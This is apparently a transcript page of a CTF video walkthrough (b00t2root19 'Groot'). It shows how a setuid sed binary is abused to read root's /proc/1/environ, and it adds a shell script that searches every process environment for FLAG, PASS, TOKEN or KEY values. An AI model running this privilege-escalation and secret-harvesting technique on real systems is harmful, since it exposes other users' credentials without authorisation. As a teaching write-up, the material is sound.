b00t2root19 CTF: Groot (3/3) [LINUX Post-Exploitation]
Key Takeaways
Solves a Linux post-exploitation challenge by abusing a setuid `sed` binary, which runs with root's effective UID, to read root-only files: here the environment of PID 1 (`/proc/1/environ`), where the flag is stored as an environment variable.
Full Transcript
Hello ladies and gentlemen, my name is John Hammond. Welcome back to the video. We're talking about the b00t2root CTF, the 2019 edition. We're in the Linux category, and this is the last challenge in that category, called Groot: "We know Groot's no more, but we can still hear him in the environment. Can you?" And we have our connect auto script. We had to solve Tony Stank first, as in we needed to become the Tony user, because that gives us our privileges, and this is again the exact same connect auto script. So this challenge has been kind of continuing off itself, building off itself. So here I am, still logged in as Tony, and that user... I minimized that on accident, okay.

So what we know now is that we have sed as a potential privilege escalation avenue, right, because it is running as a setuid binary. sed, so we have root's privileges when we use sed. We can check out GTFOBins and we could get a root shell potentially; we also can write files as root, etc. etc. We could use this to do a lot of damage potentially. All we've done so far is just read a file with it. So, knowing that challenge prompt, I'll showcase just reading that file again. It was .flag, because that does not have any user privileges; only root can read that. So very important that we know that in this case.

Now what we can do is something very, very special pertaining to this challenge prompt. It's a hint here: "we know Groot's no more, but we can still hear him in the environment." So environment, right, you'd think of environment variables. You can check out env; you can see we've got a lot of environment variables that are set. None of them extremely useful right now, but remember, we want to know Groot's environment, and Groot's not a user, so it must be referring to root, the Linux user root. And remember when we checked out running processes, we had root doing this thing that had the original flag, and that's process ID 1. Root has a lot of other processes running, so if you wanted to, why don't we check out the environment variables for every process that's running, right? Maybe we've got some good avenue there. You can check through one of these one by one, you can do a loop; however, what I'm just going to end up doing here is: you go ahead and cat out, like we had done before, the /proc folder in the Linux filesystem. You can check out all the different information you can get about a process: what the command line is, the executable, the current working directory, etc. If you had the privileges, we could check out /proc/1/cmdline, and that's what we did to solve the first challenge, or we could check out some other information like the environment variables, and environ is what it's called, sorry. And we aren't able to read it as Tony, remember, because it's root's environment variables, so you have to read it as root. sed gives us that capability, so we can run sed with no regular expression to replace or work with; we just read that file, and there we go. Again, if you were to pipe this into strings, on a machine that you had strings on, you could see that in a little bit more readable fashion. However, we've got flag equals b00t2root, I am Groot, and that's that. That is the last challenge in the Linux category. Go ahead and submit that for that many points, and now you're on the list, now you're in that portion. I know that we did get first blood on that, or I'm more than certain we got first blood on that... maybe we didn't, I don't know, I thought we had. Maybe obviously we hadn't, but I know we were very excited about it, Raj and I. Again, props to Raj, special thank you to you for participating with me and in the Discord server. If you are not in the Discord server, you absolutely should be; link in the description, come hang out. If you like this video, please do like, comment, subscribe. I'll see you in the next video.
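The enumeration the video describes, checking the environment of every running process through /proc with a privileged reader, written out as an added shell example. This is not the video's or the CTF's own code. The function takes the proc directory, a pattern, and the reader command as parameters: on the challenge box that would be `/proc` and the setuid `sed ''`; in the usage below the proc-style tree, pid numbers, variable names and flag value are constructed sample data, not anything from the challenge.

```shell
#!/bin/sh
# Added example: grep the environment of every process under a proc-style
# directory. Each PID/environ file is a NUL-separated list of VAR=value
# entries and is readable only by the process owner (or root), so the
# reader command is configurable: "cat" for your own processes, or a
# root-owned setuid utility such as `sed ''` for everyone else's.
#
# Usage: scan_environ PROC_DIR PATTERN [READER...]
#   scan_environ /proc 'FLAG|PASS|TOKEN|KEY' sed ''
# Output: one line per matching variable, "<pid>:<VAR=value>".
scan_environ() {
    proc_dir=$1; pattern=$2; shift 2
    if [ $# -eq 0 ]; then set -- cat; fi        # default reader
    for envfile in "$proc_dir"/[0-9]*/environ; do
        [ -e "$envfile" ] || continue           # no PID dirs at all
        pid=${envfile#"$proc_dir"/}; pid=${pid%/environ}
        # The reader fails (EACCES) for processes we may not inspect;
        # errors are discarded so the loop keeps going. NULs become
        # newlines so grep sees one variable per line.
        "$@" "$envfile" 2>/dev/null | tr '\0' '\n' | grep -E "$pattern" 2>/dev/null |
        while IFS= read -r var; do
            printf '%s:%s\n' "$pid" "$var"
        done
    done
}

# Constructed sample tree (hypothetical PIDs and values) so the example
# runs without privileges; delete this part to use the function on /proc.
demo_scan() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/1" "$tmp/42"
    printf 'PATH=/usr/bin\000FLAG=b00t2root{constructed}\000' > "$tmp/1/environ"
    printf 'HOME=/home/tony\000SHELL=/bin/bash\000'          > "$tmp/42/environ"
    scan_environ "$tmp" "$1"
    rm -rf "$tmp"
}

# Stand-alone use on a real box: ./scan_environ.sh /proc 'FLAG|PASS' sed ''
if [ "$#" -ge 2 ]; then scan_environ "$@"; fi
```

Before relying on this, confirm the two facts the trick depends on: `find / -perm -4000 -type f 2>/dev/null` lists the setuid binaries (sed should be among them on the challenge box), and `ls -l /proc/1/environ` shows a root-owned file with mode 0400, which is why the plain `cat` as Tony fails. Two caveats: `environ` is a snapshot of the environment at exec time, so a variable a process sets later with `setenv` does not appear there, and a procfs mounted with `hidepid=2` hides other users' PID directories entirely, in which case the loop simply finds nothing to read.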
Original Description
If you would like to support me, please like, comment & subscribe, and check me out on Patreon: https://patreon.com/johnhammond010
E-mail: johnhammond010@gmail.com
PayPal: http://paypal.me/johnhammond010
GitHub: https://github.com/JohnHammond
Site: http://www.johnhammond.org
Twitter: https://twitter.com/_johnhammond